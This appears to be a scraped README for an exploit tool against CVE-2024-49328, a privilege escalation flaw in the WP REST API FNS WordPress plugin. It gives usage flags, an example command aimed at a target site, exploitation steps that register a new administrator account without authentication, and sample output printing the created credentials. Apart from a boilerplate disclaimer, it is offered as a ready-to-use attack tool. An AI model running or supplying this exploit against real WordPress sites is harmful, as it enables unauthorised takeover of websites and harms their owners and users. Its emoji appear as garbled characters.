## https://sploitus.com/exploit?id=0FAFB36E-FCEF-5A02-A323-06538CBEFCFE
# CVE-2024-49328-exploit
# ๐ Description:
This script exploits a privilege escalation vulnerability in the WP REST API FNS Plugin for WordPress. The vulnerability affects all versions up to and including `1.0.0`, allowing unauthenticated attackers to gain administrator privileges.
## โ๏ธ Usage
```bash
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
-e NEWEMAIL, --Newemail NEWEMAIL New email to register
-p PASSWORD, --password PASSWORD Password for the new user
```
Example Command:
```
python CVE-2024-49328.py -u http://targetsite.com -e admin@example.com -p password123
```
### ๐ Details of Exploitation
| **Step** | **Description** | **Icon** |
|----------|---------------------------------------------------------------|--------------------|
| Step 1 | Verify the version of the plugin. | ๐ |
| Step 2 | Check if the version is exploitable (`1.0.0`, or lower).| โ |
| Step 3 | Exploit the vulnerability and register a new admin user. | ๐ |
| Step 4 | Print the result with user credentials for verification. | ๐ |
## โก๏ธ Example Output
```
Found Stable tag version: 1.0.0
Version 1.0.0 is exploitable.
Exploiting the site... Please wait.
Successfully
Username: Nxploit@admin.sa
Password: nxploit
```
### Install the required packages
```
pip install requests
```
## โ ๏ธ Disclaimer
๐จ Warning:
This script is for educational purposes only. Unauthorized use of this script against systems without explicit permission is illegal and unethical.